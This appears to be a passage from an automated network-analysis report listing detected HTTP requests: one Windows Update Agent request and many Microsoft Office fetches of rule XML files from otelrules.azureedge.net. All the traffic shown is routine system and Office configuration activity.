            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cW5bTrG1rw+aTtT&MD=dl6frla3 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
